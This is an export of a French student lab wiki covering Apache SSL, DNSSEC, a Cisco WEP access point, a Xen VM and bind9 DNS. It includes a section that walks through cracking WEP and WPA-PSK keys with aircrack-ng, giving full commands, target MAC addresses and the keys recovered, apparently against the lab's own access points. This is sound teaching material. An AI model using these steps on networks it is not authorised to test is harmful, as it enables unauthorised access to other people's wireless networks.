gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
    9    0/  1   EE(45312) 74(42496) E7(40960) 6C(40192) 28(39936) 1B(39680) AF(39680) 71(38656) 44(38400) 2C(37888) &lt;br /&gt;
   10    3/  1   62(39424) BC(39424) 48(39168) 56(38912) AF(38912) 23(38400) 98(38400) A7(38144) 2B(37888) 79(37888) &lt;br /&gt;
   11    5/  1   68(38656) E9(38656) F9(38656) 1E(38400) 36(38400) 5A(38144) 92(38144) 5C(37888) 87(37888) CB(37888) &lt;br /&gt;
   12    0/  2   79(40780) 62(40380) 4D(40156) 85(39388) DE(39280) 4E(39060) 98(38876) A7(38544) 6A(38432) 82(38144) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clé WPA-PSK ===&lt;br /&gt;
Le cassage de clé WPA est légèrement diffèrent de celui WEP. Nous utilisons les mêmes outils (aircrack-ng) mais nous devons fournir un dictionnaire avec tous les mots de passe. Dans notre cas, nous avons décidé de prendre une clé de 8 chiffres. &lt;br /&gt;
Nous utilisons pour commencer&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35658</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35658"/>
				<updated>2016-12-06T11:08:39Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{| class=&amp;quot;wikitable centre&amp;quot; width=&amp;quot;100%&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
! scope=col | N° VLAN&lt;br /&gt;
! scope=col | Prénom&lt;br /&gt;
! scope=col | Réseau local&lt;br /&gt;
! scope=col | Nom VM&lt;br /&gt;
! scope=col | @IP VM &lt;br /&gt;
|-&lt;br /&gt;
| VLAN20        &lt;br /&gt;
| Dimitri          &lt;br /&gt;
| 10.60.20.0/24&lt;br /&gt;
| Vald&lt;br /&gt;
|193.48.57.182/28&lt;br /&gt;
|-&lt;br /&gt;
|VLAN21           &lt;br /&gt;
| Nabil         &lt;br /&gt;
| 10.60.21.0/24&lt;br /&gt;
| Pnl&lt;br /&gt;
|193.48.57.177/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN22&lt;br /&gt;
| Otmane              &lt;br /&gt;
| 10.60.22.0/24&lt;br /&gt;
| Lartiste&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN23  &lt;br /&gt;
| Hugo               &lt;br /&gt;
| 10.60.23.0/24 &lt;br /&gt;
| Gradur&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN24 &lt;br /&gt;
| Clement              &lt;br /&gt;
| 10.60.24.0/24 &lt;br /&gt;
| Gringe&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
|-&lt;br /&gt;
| VLAN25   &lt;br /&gt;
| Joan            &lt;br /&gt;
| 10.60.25.0/24 &lt;br /&gt;
| Orelsan&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;TABLE BORDER=&amp;quot;1&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;CAPTION&amp;gt; Voici le titre du tableau &amp;lt;/CAPTION&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; N° VLAN &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Prénom &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Réseau local &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Nom VM &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; @IP VM &amp;lt;/TH&amp;gt;&lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN20 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Dimitri &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.20.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Vald &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.182/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN21 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Nabil &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.21.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Pnl &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.177/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN22 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Hugo &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.22.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gradur &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.178/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN23 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Otmane &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.23.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Lartiste &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.179/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN24 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Clement &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.24.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gringe &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.180/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TH&amp;gt; VLAN25 &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Joan &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.25.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Orelsan &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.181/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
&amp;lt;/TABLE&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètre de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
